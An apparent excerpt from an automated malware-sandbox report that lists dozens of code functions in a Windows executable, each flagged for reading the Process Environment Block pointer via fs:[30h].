Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A61C mov eax, dword ptr fs:[00000030h] 36_2_1E17A61C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A61C mov eax, dword ptr fs:[00000030h] 36_2_1E17A61C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14C600 mov eax, dword ptr fs:[00000030h] 36_2_1E14C600
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14C600 mov eax, dword ptr fs:[00000030h] 36_2_1E14C600
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14C600 mov eax, dword ptr fs:[00000030h] 36_2_1E14C600
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E178E00 mov eax, dword ptr fs:[00000030h] 36_2_1E178E00
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E158A0A mov eax, dword ptr fs:[00000030h] 36_2_1E158A0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FFE3F mov eax, dword ptr fs:[00000030h] 36_2_1E1FFE3F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14E620 mov eax, dword ptr fs:[00000030h] 36_2_1E14E620
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218A62 mov eax, dword ptr fs:[00000030h] 36_2_1E218A62
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1D4257 mov eax, dword ptr fs:[00000030h] 36_2_1E1D4257
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h] 36_2_1E149240
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h] 36_2_1E149240
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h] 36_2_1E149240
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h] 36_2_1E149240
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h] 36_2_1E157E41
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E18927A mov eax, dword ptr fs:[00000030h] 36_2_1E18927A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h] 36_2_1E16AE73
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15766D mov eax, dword ptr fs:[00000030h] 36_2_1E15766D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FB260 mov eax, dword ptr fs:[00000030h] 36_2_1E1FB260
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FB260 mov eax, dword ptr fs:[00000030h] 36_2_1E1FB260
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17D294 mov eax, dword ptr fs:[00000030h] 36_2_1E17D294
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17D294 mov eax, dword ptr fs:[00000030h] 36_2_1E17D294
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E210EA5 mov eax, dword ptr fs:[00000030h] 36_2_1E210EA5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E210EA5 mov eax, dword ptr fs:[00000030h] 36_2_1E210EA5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E210EA5 mov eax, dword ptr fs:[00000030h] 36_2_1E210EA5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DFE87 mov eax, dword ptr fs:[00000030h] 36_2_1E1DFE87
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15AAB0 mov eax, dword ptr fs:[00000030h] 36_2_1E15AAB0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15AAB0 mov eax, dword ptr fs:[00000030h] 36_2_1E15AAB0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17FAB0 mov eax, dword ptr fs:[00000030h] 36_2_1E17FAB0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1452A5 mov eax, dword ptr fs:[00000030h] 36_2_1E1452A5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C46A7 mov eax, dword ptr fs:[00000030h] 36_2_1E1C46A7
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1736CC mov eax, dword ptr fs:[00000030h] 36_2_1E1736CC
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FFEC0 mov eax, dword ptr fs:[00000030h] 36_2_1E1FFEC0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E188EC7 mov eax, dword ptr fs:[00000030h] 36_2_1E188EC7
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1716E0 mov ecx, dword ptr fs:[00000030h] 36_2_1E1716E0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218ED6 mov eax, dword ptr fs:[00000030h] 36_2_1E218ED6
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1576E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1576E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16F716 mov eax, dword ptr fs:[00000030h] 36_2_1E16F716
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DFF10 mov eax, dword ptr fs:[00000030h] 36_2_1E1DFF10
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DFF10 mov eax, dword ptr fs:[00000030h] 36_2_1E1DFF10
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A70E mov eax, dword ptr fs:[00000030h] 36_2_1E17A70E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A70E mov eax, dword ptr fs:[00000030h] 36_2_1E17A70E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17E730 mov eax, dword ptr fs:[00000030h] 36_2_1E17E730
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21070D mov eax, dword ptr fs:[00000030h] 36_2_1E21070D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21070D mov eax, dword ptr fs:[00000030h] 36_2_1E21070D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E144F2E mov eax, dword ptr fs:[00000030h] 36_2_1E144F2E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E144F2E mov eax, dword ptr fs:[00000030h] 36_2_1E144F2E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E20131B mov eax, dword ptr fs:[00000030h] 36_2_1E20131B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218F6A mov eax, dword ptr fs:[00000030h] 36_2_1E218F6A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14F358 mov eax, dword ptr fs:[00000030h] 36_2_1E14F358
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14DB40 mov eax, dword ptr fs:[00000030h] 36_2_1E14DB40
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15EF40 mov eax, dword ptr fs:[00000030h] 36_2_1E15EF40
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E173B7A mov eax, dword ptr fs:[00000030h] 36_2_1E173B7A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E173B7A mov eax, dword ptr fs:[00000030h] 36_2_1E173B7A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14DB60 mov ecx, dword ptr fs:[00000030h] 36_2_1E14DB60
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15FF60 mov eax, dword ptr fs:[00000030h] 36_2_1E15FF60
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218B58 mov eax, dword ptr fs:[00000030h] 36_2_1E218B58
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E158794 mov eax, dword ptr fs:[00000030h] 36_2_1E158794
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E215BA5 mov eax, dword ptr fs:[00000030h] 36_2_1E215BA5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17B390 mov eax, dword ptr fs:[00000030h] 36_2_1E17B390
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7794 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7794
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7794 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7794
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7794 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7794
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E151B8F mov eax, dword ptr fs:[00000030h] 36_2_1E151B8F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E151B8F mov eax, dword ptr fs:[00000030h] 36_2_1E151B8F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FD380 mov ecx, dword ptr fs:[00000030h] 36_2_1E1FD380
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E20138A mov eax, dword ptr fs:[00000030h] 36_2_1E20138A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1837F5 mov eax, dword ptr fs:[00000030h] 36_2_1E1837F5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7016 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7016
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7016 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7016
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7016 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7016
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h] 36_2_1E1C6C0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h] 36_2_1E1C6C0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h] 36_2_1E1C6C0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h] 36_2_1E1C6C0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21740D mov eax, dword ptr fs:[00000030h] 36_2_1E21740D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21740D mov eax, dword ptr fs:[00000030h] 36_2_1E21740D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21740D mov eax, dword ptr fs:[00000030h] 36_2_1E21740D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E214015 mov eax, dword ptr fs:[00000030h] 36_2_1E214015
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E214015 mov eax, dword ptr fs:[00000030h] 36_2_1E214015
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17BC2C mov eax, dword ptr fs:[00000030h] 36_2_1E17BC2C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h] 36_2_1E15B02A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h] 36_2_1E15B02A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h] 36_2_1E15B02A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h] 36_2_1E15B02A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E160050 mov eax, dword ptr fs:[00000030h] 36_2_1E160050
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E160050 mov eax, dword ptr fs:[00000030h] 36_2_1E160050
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DC450 mov eax, dword ptr fs:[00000030h] 36_2_1E1DC450
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DC450 mov eax, dword ptr fs:[00000030h] 36_2_1E1DC450
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E202073 mov eax, dword ptr fs:[00000030h] 36_2_1E202073
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E211074 mov eax, dword ptr fs:[00000030h] 36_2_1E211074
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A44B mov eax, dword ptr fs:[00000030h] 36_2_1E17A44B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16746D mov eax, dword ptr fs:[00000030h] 36_2_1E16746D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15849B mov eax, dword ptr fs:[00000030h] 36_2_1E15849B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149080 mov eax, dword ptr fs:[00000030h] 36_2_1E149080
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C3884 mov eax, dword ptr fs:[00000030h] 36_2_1E1C3884
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C3884 mov eax, dword ptr fs:[00000030h] 36_2_1E1C3884
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17F0BF mov ecx, dword ptr fs:[00000030h] 36_2_1E17F0BF
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17F0BF mov eax, dword ptr fs:[00000030h] 36_2_1E17F0BF
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17F0BF mov eax, dword ptr fs:[00000030h] 36_2_1E17F0BF
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1890AF mov eax, dword ptr fs:[00000030h] 36_2_1E1890AF
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov ecx, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E2014FB mov eax, dword ptr fs:[00000030h] 36_2_1E2014FB
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h] 36_2_1E1C6CF0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h] 36_2_1E1C6CF0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h] 36_2_1E1C6CF0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218CD6 mov eax, dword ptr fs:[00000030h] 36_2_1E218CD6
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149100 mov eax, dword ptr fs:[00000030h] 36_2_1E149100
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149100 mov eax, dword ptr fs:[00000030h] 36_2_1E149100
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149100 mov eax, dword ptr fs:[00000030h] 36_2_1E149100
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218D34 mov eax, dword ptr fs:[00000030h] 36_2_1E218D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14AD30 mov eax, dword ptr fs:[00000030h] 36_2_1E14AD30
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1CA537 mov eax, dword ptr fs:[00000030h] 36_2_1E1CA537
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E174D3B mov eax, dword ptr fs:[00000030h] 36_2_1E174D3B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E174D3B mov eax, dword ptr fs:[00000030h] 36_2_1E174D3B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E174D3B mov eax, dword ptr fs:[00000030h] 36_2_1E174D3B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17513A mov eax, dword ptr fs:[00000030h] 36_2_1E17513A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17513A mov eax, dword ptr fs:[00000030h] 36_2_1E17513A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov ecx, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E167D50 mov eax, dword ptr fs:[00000030h] 36_2_1E167D50
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16B944 mov eax, dword ptr fs:[00000030h] 36_2_1E16B944
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16B944 mov eax, dword ptr fs:[00000030h] 36_2_1E16B944
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E183D43 mov eax, dword ptr fs:[00000030h] 36_2_1E183D43
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C3540 mov eax, dword ptr fs:[00000030h] 36_2_1E1C3540
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16C577 mov eax, dword ptr fs:[00000030h] 36_2_1E16C577
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16C577 mov eax, dword ptr fs:[00000030h] 36_2_1E16C577
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B171 mov eax, dword ptr fs:[00000030h] 36_2_1E14B171
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B171 mov eax, dword ptr fs:[00000030h] 36_2_1E14B171
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14C962 mov eax, dword ptr fs:[00000030h] 36_2_1E14C962
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17FD9B mov eax, dword ptr fs:[00000030h] 36_2_1E17FD9B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17FD9B mov eax, dword ptr fs:[00000030h] 36_2_1E17FD9B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A185 mov eax, dword ptr fs:[00000030h] 36_2_1E17A185
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16C182 mov eax, dword ptr fs:[00000030h] 36_2_1E16C182
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
